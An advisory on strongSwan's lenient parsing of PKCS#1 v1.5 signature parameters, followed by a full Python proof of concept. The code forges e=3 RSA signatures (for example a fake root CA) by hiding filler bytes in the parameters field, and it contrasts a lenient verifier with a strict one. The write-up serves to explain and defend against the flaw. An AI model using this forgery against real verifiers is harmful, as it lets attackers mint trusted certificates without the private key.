Description |
The AlgorithmIdentifier structure inside a PKCS#1 v1.5 signature (the digestAlgorithm of the DigestInfo) contains an optional parameters field. None of the hash algorithms used with PKCS#1 take parameters, so the field should always be encoded as an ASN.1 NULL value, but the strongSwan decoder doesn't enforce this and simply skips over the parameters. This allows an attacker to fill the field with arbitrary data, which makes a Bleichenbacher-style attack on low-exponent keys possible: the attacker can forge signatures, and therefore create arbitrary CA certificates, without knowing the private key. |
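The forgery the description refers to, as an added worked example (this is not strongSwan code and not part of the original advisory): a Bleichenbacher-style e=3 forgery that places attacker-chosen filler in the AlgorithmIdentifier parameters, beside a PKCS#1 v1.5 verifier that can run in the lenient mode described above (skip the parameters) or in a strict mode that requires NULL. The function and constant names (`forge`, `verify`, `der`, `der_read`, `icbrt`, `forge_signature`, `GARBAGE`), the message and the modulus are all constructed for the demonstration; the modulus is a random 2048-bit odd integer standing in for a victim's e=3 public key, which is enough because the forgery never touches the private key or the factors.

```python
import hashlib
import secrets

E, K = 3, 256                                        # e = 3, RSA-2048 (256-byte EM)
SHA256_OID = bytes.fromhex("608648016503040201")     # id-sha256, DER content bytes
GARBAGE = 180             # attacker-chosen filler bytes placed in the parameters field
SUFFIX = 2 + 32           # fixed tail of EM: '04 20' || SHA-256 digest


def der(tag, body):
    """Minimal DER TLV encoder (definite lengths below 65536)."""
    n = len(body)
    length = (bytes([n]) if n < 0x80 else b"\x81" + bytes([n]) if n < 0x100
              else b"\x82" + n.to_bytes(2, "big"))
    return bytes([tag]) + length + body


def der_read(buf, pos):
    """Read one TLV at pos; return (tag, content, offset just after the TLV)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                                # long form: next bytes hold the length
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:pos + length], pos + length


def icbrt(x):
    """Floor of the integer cube root, by bisection."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= x else (lo, mid - 1)
    return lo


def forge(msg):
    """Bleichenbacher e=3 forgery: find s with s**3 equal, as a K-byte string, to an
    EM the lenient verifier accepts for msg. No key material is used at all."""
    digest = hashlib.sha256(msg).digest()
    if not digest[-1] & 1:
        raise ValueError("digest tail must be odd for the cube root mod 2^k to exist")
    # DigestInfo with an OCTET STRING of placeholder zeros where the NULL belongs.
    alg = der(0x30, der(0x06, SHA256_OID) + der(0x04, bytes(GARBAGE)))
    t = der(0x30, alg + der(0x04, digest))
    em = b"\x00\x01" + b"\xff" * (K - 3 - len(t)) + b"\x00" + t
    assert K - 3 - len(t) >= 8 and em[K - SUFFIX - GARBAGE:K - SUFFIX] == bytes(GARBAGE)
    # 1. Low part: the tail is fixed, so s must be a cube root of it mod 2^(8*SUFFIX).
    #    Odd residues mod 2^k form a group of order 2^(k-1), coprime to 3, so cubing is
    #    a bijection there and the root is tail ** (3^-1 mod 2^(k-1)).
    k = 8 * SUFFIX
    tail = int.from_bytes(em[-SUFFIX:], "big")
    s_lo = pow(tail, pow(3, -1, 1 << (k - 1)), 1 << k)
    # 2. High part: cube root of the fixed prefix shifted into place, rounded up to a
    #    multiple of 2^k, then OR in s_lo. This perturbs s**3 by about 3*s^2*2^k
    #    (below 2^1632 here), which lands entirely inside the GARBAGE bytes because
    #    8*GARBAGE + k = 1712 bits. The assert below checks exactly that.
    prefix = int.from_bytes(em[:K - SUFFIX - GARBAGE], "big") << (8 * (GARBAGE + SUFFIX))
    s = (((icbrt(prefix) >> k) + 1) << k) | s_lo
    assert prefix <= s ** 3 < prefix + (1 << (8 * (GARBAGE + SUFFIX)))
    return s.to_bytes(K, "big")


def verify(n, sig, msg, strict):
    """EMSA-PKCS1-v1_5 check. strict=True requires the parameters to be NULL (or
    absent); strict=False skips whatever is there, the flaw described above."""
    try:
        em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(K, "big")
        sep = em.index(b"\x00", 2)                   # end of the 0xFF padding
        if em[:2] != b"\x00\x01" or sep < 10 or em[2:sep] != b"\xff" * (sep - 2):
            return False
        tag, di, end = der_read(em, sep + 1)         # DigestInfo must fill the rest
        if tag != 0x30 or end != K:
            return False
        tag, alg, p = der_read(di, 0)                # AlgorithmIdentifier
        tag2, oid, q = der_read(alg, 0)              # its OID
        if tag != 0x30 or tag2 != 0x06 or oid != SHA256_OID:
            return False
        if q < len(alg):                             # a parameters field is present
            ptag, pval, q = der_read(alg, q)
            if strict and (ptag != 0x05 or pval):    # anything but NULL is rejected
                return False
        tag, digest, p = der_read(di, p)             # digest OCTET STRING
        return (q == len(alg) and tag == 0x04 and p == len(di)
                and digest == hashlib.sha256(msg).digest())
    except (IndexError, ValueError):
        return False


def forge_signature(tbs):
    """The attacker controls the signed bytes (a tbsCertificate, say), so bump a
    serial number until the digest ends in an odd byte, then forge."""
    for serial in range(256):
        msg = tbs + b" serial=%d" % serial
        if hashlib.sha256(msg).digest()[-1] & 1:
            return msg, forge(msg)
    raise RuntimeError("no odd digest in 256 tries")  # probability 2^-256


# Stand-in for the victim CA's 2048-bit public modulus (constructed: a random odd
# integer). Its factors are never needed: s**3 < 2^2033 < n, so no reduction occurs.
N = (1 << 2047) | secrets.randbits(2047) | 1

if __name__ == "__main__":
    msg, sig = forge_signature(b"CN=Forged Root CA")
    print("lenient verifier accepts the forgery:", verify(N, sig, msg, strict=False))
    print("strict verifier accepts the forgery: ", verify(N, sig, msg, strict=True))
```

Two points the code makes concrete. First, the whole attack works because the cube never wraps: s is about 678 bits, so s**3 stays below 2^2033 and the verifier's pow(s, 3, n) returns the attacker's byte string unchanged for any 2048-bit modulus, which is why neither n nor the private key enters `forge`. Second, the only freedom the attacker needs is a run of don't-care bytes somewhere in EM; a decoder that skips the parameters field hands them exactly that, while the one-line strict check (`ptag == 0x05` with empty content) removes it. The odd-tail requirement is not a real obstacle when the attacker chooses the signed content, as `forge_signature` shows by varying a serial number.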